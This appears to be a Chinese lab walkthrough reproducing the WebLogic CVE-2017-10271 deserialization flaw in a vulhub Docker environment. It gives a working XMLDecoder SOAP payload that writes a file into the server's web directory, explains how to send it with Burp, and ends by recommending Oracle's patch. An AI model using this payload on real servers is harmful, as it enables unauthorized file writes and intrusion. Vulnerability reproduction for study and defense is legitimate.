一丶漏洞环境
kail下vulhub+Docker,自行下载安装vulhub和docker
1丶部署CVE-2017-10271
2丶查看虚拟机状态可以看到端口映射到了7001;浏览器访问http://X.X.X.X:7001/console/
二丶漏洞复现
1丶weblogic默认开启7001和7002端口,访问http://172.18.0.1/wls-wsat/CoordinatorPortType;如果存在这个界面可能存在该漏洞
2丶利用此漏洞进行文件上传,构造以下poc
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.6.0" class="java.beans.XMLDecoder">
<object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt</string><void method="println">
<string>I am </string></void><void method="close"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
3丶打开bp,Get方法修改为POST ,//修改为/,添加Content-Type:text/xml,发包:
4丶访问上传页面test.txt,发现上传成功
三丶修复建议
Oracle官网下载补丁